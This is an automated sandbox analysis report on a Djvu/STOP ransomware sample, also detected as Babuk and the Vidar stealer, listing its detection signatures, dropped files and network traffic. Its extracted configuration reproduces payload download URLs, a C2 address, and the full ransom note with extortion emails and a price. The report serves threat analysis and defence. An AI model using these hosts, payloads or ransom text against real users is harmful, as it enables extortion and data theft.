Windows Analysis Report
UXNob1Dp32.exe

Overview

General Information

Sample name:	UXNob1Dp32.exe renamed because original name is a hash value
Original sample name:	c3804647168d439928c2ca4019d87609.exe
Analysis ID:	1430719
MD5:	c3804647168d439928c2ca4019d87609
SHA1:	ceb7a332a4ed40878a2c381fcf76fcd06528df65
SHA256:	651bf6dc2ce11fbbda045ac186ab58ac3d691f8d28dc811f2b1552fe74b275cc
Tags:	exeTeamBot
Infos:

Detection

Babuk, Clipboard Hijacker, Djvu, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Found ransom note / readme

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Babuk Ransomware

Yara detected Clipboard Hijacker

Yara detected Djvu Ransomware

Yara detected Vidar stealer

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Infects executable files (exe, dll, sys, html)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes a notice file (html or txt) to demand a ransom

Writes many files with high entropy

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops certificate files (DER)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Babuk	Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.	No Attribution	http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/ https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/ https://blog.morphisec.com/babuk-ransomware-variant-major-attack https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/	https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk

Name	Description	Attribution	Blogpost URLs	Link
STOP, Djvu	STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.	No Attribution	https://angle.ankura.com/post/102het9/the-stop-ransomware-variant https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/ https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stop

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: UXNob1Dp32.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://cajgtus.com/files/1/build3.exe?	Avira URL Cloud: Label: malware
Source: http://sdfjhuz.com/dl/build2.exe/	Avira URL Cloud: Label: malware
Source: http://sdfjhuz.com/dl/build2.exe$run	Avira URL Cloud: Label: malware
Source: http://sdfjhuz.com/dl/build2.exerun35g	Avira URL Cloud: Label: malware
Source: http://sdfjhuz.com/dl/build2.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe

Avira: detection malicious, Label: TR/AD.MalwareCrypter.llbpm

Found malware configuration

Source: 00000017.00000002.2065451364.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Djvu {"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test2/get.php", "Ransom note file": "_README.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0864PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E
Source: 00000008.00000002.1752904498.00000000035A0000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}

Multi AV Scanner detection for domain / URL

Source: sdfjhuz.com	Virustotal: Detection: 23%	Perma Link
Source: http://sdfjhuz.com/dl/build2.exe/	Virustotal: Detection: 18%	Perma Link
Source: http://cajgtus.com/test2/get.php	Virustotal: Detection: 11%	Perma Link
Source: http://sdfjhuz.com/dl/build2.exe	Virustotal: Detection: 26%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe	Virustotal: Detection: 87%	Perma Link
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Virustotal: Detection: 46%	Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Virustotal: Detection: 87%	Perma Link

Multi AV Scanner detection for submitted file

Source: UXNob1Dp32.exe

Virustotal: Detection: 42%

Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: UXNob1Dp32.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00411178 CryptDestroyHash,CryptReleaseContext,	1_2_00411178
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	1_2_0040E870
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040EA51 CryptDestroyHash,CryptReleaseContext,	1_2_0040EA51
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	1_2_0040EAA0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040EC68 CryptDestroyHash,CryptReleaseContext,	1_2_0040EC68
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	1_2_00410FC0

Source: UXNob1Dp32.exe, 00000006.00000002.4081262958.0000000000798000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_d21dbb34-7

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Unpacked PE file: 1.2.UXNob1Dp32.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Unpacked PE file: 6.2.UXNob1Dp32.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Unpacked PE file: 9.2.build2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Unpacked PE file: 12.2.UXNob1Dp32.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Unpacked PE file: 14.2.build3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 20.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Unpacked PE file: 24.2.UXNob1Dp32.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 27.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 30.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 32.2.mstsca.exe.400000.0.unpack

Uses 32bit PE files

Source: UXNob1Dp32.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\$WinREAgent\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\$WinREAgent\Scratch\_README.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	File created: C:\_README.txt
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	File created: C:\Users\user\_README.txt

Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.59.200.146:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.9.149:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49755 version: TLS 1.2

Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\l* source: UXNob1Dp32.exe, 00000005.00000003.2193278581.0000000003488000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2193874690.0000000003491000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194897418.0000000003498000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2121514211.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119079628.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2141866780.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140711382.00000000034BD000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140465227.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2142950234.00000000034D5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2187900703.000000000387B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2195602941.000000000387B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194961891.000000000387B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ation source: UXNob1Dp32.exe, 00000005.00000002.2203764277.00000000032E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\gefolusopu\refugefifacek-cibecuciru.pdb source: UXNob1Dp32.exe, 00000000.00000002.1626432855.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000000.00000000.1621402719.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000001.00000000.1624079487.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000003.00000002.1650673211.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000003.00000000.1643851973.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000004.00000000.1645744558.0000000000411000.00000002.00000001.01000000.00000007.sdmp, UXNob1Dp32.exe, 00000004.00000002.1656657577.0000000000411000.00000002.00000001.01000000.00000007.sdmp, UXNob1Dp32.exe, 00000005.00000000.1648043653.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000006.00000000.1654206960.0000000000411000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Z source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\W source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2182625216.0000000003795000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2174814325.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2181866623.0000000003745000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183364884.000000000379C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\P source: UXNob1Dp32.exe, 00000005.00000003.2142833395.000000000367B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2143136874.0000000003693000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152891886.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152955677.000000000369B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2192209394.0000000003804000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2192869446.0000000003692000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2193084806.00000000036C3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\ source: UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036A3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152891886.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152955677.000000000369B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170851615.0000000003692000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\U source: UXNob1Dp32.exe, 00000005.00000003.1836470979.000000000318E000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836548366.00000000031A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\baduleropolec\83 roxihapuponab.pdb source: build2.exe, 00000008.00000000.1746999590.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000008.00000002.1751118423.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\cs\ source: UXNob1Dp32.exe, 00000005.00000003.2140465227.0000000003428000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\0 source: UXNob1Dp32.exe, 00000005.00000003.2075994382.000000000313B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\r\\l7+P8 source: UXNob1Dp32.exe, 00000005.00000003.2195346057.0000000003154000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189453431.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2188598539.0000000003151000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194516135.0000000003151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2193640577.000000000338F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error\ source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\we\y) source: UXNob1Dp32.exe, 00000005.00000003.2188967976.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182066894.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189516260.000000000340F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000000B.00000000.1793257120.0000000000401000.00000020.00000001.01000000.00000009.sdmp, mstsca.exe, 00000020.00000000.3617544736.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\App source: UXNob1Dp32.exe, 00000005.00000003.2170203340.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171630947.0000000003166000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\R source: UXNob1Dp32.exe, 00000005.00000003.2182625216.00000000037EC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189117308.00000000037ED000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2188768311.00000000037AC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2187900703.0000000003785000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\[C source: UXNob1Dp32.exe, 00000005.00000003.2176697587.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176771216.00000000036D3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175838580.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.00000000036E5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\p\s\ source: UXNob1Dp32.exe, 00000005.00000003.2183537439.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183899817.00000000036FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182163208.000000000369B000.00000004.00000020.00020000.00000000.sdmp
